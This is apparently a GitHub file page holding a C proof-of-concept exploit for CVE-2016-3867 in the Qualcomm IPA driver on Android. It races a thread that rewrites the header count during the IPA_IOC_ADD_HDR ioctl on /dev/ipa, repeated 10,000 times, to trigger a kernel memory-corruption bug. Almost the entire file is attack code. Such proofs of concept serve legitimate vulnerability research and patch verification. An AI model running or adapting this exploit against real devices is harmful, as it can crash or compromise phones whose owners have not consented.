forked from ScottyBauer/Android_Kernel_CVE_POCs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2016-3867.c
118 lines (94 loc) · 2.32 KB
/
CVE-2016-3867.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
#include <stdlib.h>
#include <stdio.h>
#include <stdbool.h>
#include <strings.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <net/if.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <pthread.h>
static const char *dev = "/dev/ipa";
#define IPA_RESOURCE_NAME_MAX 32
#define IPA_HDR_MAX_SIZE 64
#define IPA_IOCTL_ADD_HDR 0
#define IPA_IOCTL_DEL_HDR 1
enum ipa_hdr_l2_type {
IPA_HDR_L2_NONE,
IPA_HDR_L2_ETHERNET_II,
IPA_HDR_L2_802_3,
IPA_HDR_L2_MAX,
};
struct ipa_hdr_del {
uint32_t hdl;
int status;
};
struct ipa_ioc_del_hdr {
uint8_t commit;
uint8_t num_hdls;
struct ipa_hdr_del hdl[0];
};
struct ipa_hdr_add {
char name[IPA_RESOURCE_NAME_MAX];
uint8_t hdr[IPA_HDR_MAX_SIZE];
uint8_t hdr_len;
enum ipa_hdr_l2_type type;
uint8_t is_partial;
uint32_t hdr_hdl;
int status;
uint8_t is_eth2_ofst_valid;
uint16_t eth2_ofst;
};
struct ipa_ioc_add_hdr {
uint8_t commit;
uint8_t num_hdrs;
struct ipa_hdr_add hdr[0];
};
#define IPA_IOC_MAGIC 0xCF
#define IPA_IOC_ADD_HDR _IOWR(IPA_IOC_MAGIC, IPA_IOCTL_ADD_HDR,\
struct ipa_ioc_add_hdr *)
#define IPA_IOC_DEL_HDR _IOWR(IPA_IOC_MAGIC, \
IPA_IOCTL_DEL_HDR,\
struct ipa_ioc_del_hdr *)
volatile int trigger = 0;
volatile int trigger1 = 0;
static void *size_change(void *hdr)
{
struct ipa_ioc_add_hdr *add_hdr = hdr;
static unsigned int stupid_hack = 2000;
trigger1 = 1;
while (trigger == 0) { };
usleep(stupid_hack);
add_hdr->num_hdrs = 255;
stupid_hack++;
if (stupid_hack > 3000)
stupid_hack = 2000;
trigger1 = 0;
return NULL;
}
int main(void)
{
int fd, counter;
pthread_t race_car;
struct ipa_ioc_add_hdr add_hdr = { 0 };
fd = open(dev, O_RDWR);
if (fd < 0) {
printf("Failed to open %s with %s\n", dev, strerror(errno));
return EXIT_FAILURE;
}
for (counter = 0; counter < 10000; counter++) {
pthread_create(&race_car, NULL, size_change, &add_hdr);
while(trigger1 != 1) {}
trigger = 1;
asm volatile("dmb ishst" : : : "memory");
ioctl(fd, IPA_IOC_ADD_HDR, &add_hdr);
pthread_join(race_car, NULL);
trigger = 0;
add_hdr.num_hdrs = 0;
}
return EXIT_FAILURE;
}